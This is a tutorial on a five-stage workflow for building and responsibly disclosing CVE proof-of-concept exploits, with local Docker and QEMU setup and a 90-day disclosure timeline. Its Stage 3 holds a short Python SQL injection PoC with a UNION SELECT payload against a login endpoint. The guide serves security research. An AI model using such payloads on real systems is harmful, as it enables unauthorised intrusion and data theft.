Tutorial
CVE PoC Development Workflow
A reproducible workflow for developing proof-of-concept exploits: vulnerability analysis, reproduction, weaponization, and responsible disclosure.
The workflow
Turning a vulnerability disclosure into a working PoC follows a repeatable process. This workflow has been validated across web, network, mobile, and IoT vulnerability classes.
Stage 1: Triage
When a potential vulnerability is reported or discovered, the first step is determining whether it is:
- Reproducible — can you trigger it reliably?
- Impactful — does it lead to data access, code execution, or privilege escalation?
- Novel — is it a known CVE or a new finding?
Each CVE in the cve-pocs repo passes all three checks before a PoC is written.
Stage 2: Reproduction environment
Set up a controlled environment that mirrors the target:
docker compose -f docker-compose.vuln.yml up -d
# Target is now at http://localhost:8080 with the vulnerable version
nmap -p- localhost # Identify open ports
curl -s http://localhost:8080 | head -20 # Fingerprint
For embedded/IoT targets, use QEMU emulation:
qemu-system-arm -M versatilepb -kernel vmlinuz -initrd initrd.img \
-append "root=/dev/ram" -hda firmware_image.bin
Stage 3: PoC development
A good PoC has three properties:
- Deterministic — same input always produces the same result
- Minimal — no extraneous requests or side effects
- Self-contained — can be run with standard tools (curl, python3, netcat)
#!/usr/bin/env python3
"""CVE-XXXX-XXXX: PoC — SQL injection in login endpoint."""
import requests, sys
target = sys.argv[1]
payload = "' UNION SELECT 1,2,3,@@version,5-- "
r = requests.post(f"{target}/login", data={"user": payload, "pass": "x"})
print(r.text if "MySQL" in r.text else "Target may be patched")
Stage 4: Documentation
Every PoC in the repo includes:
- CVE ID or tracking number
- Affected versions — exact version range
- Reproduction steps — CLI commands, not vague descriptions
- Mitigation — version upgrade, config change, or WAF rule
Stage 5: Disclosure
Responsible disclosure timeline:
- Notify vendor with PoC and impact assessment
- Allow 90-day disclosure window
- If patched, publish PoC after CVE is published
- If unpatched after 90 days, publish with advisory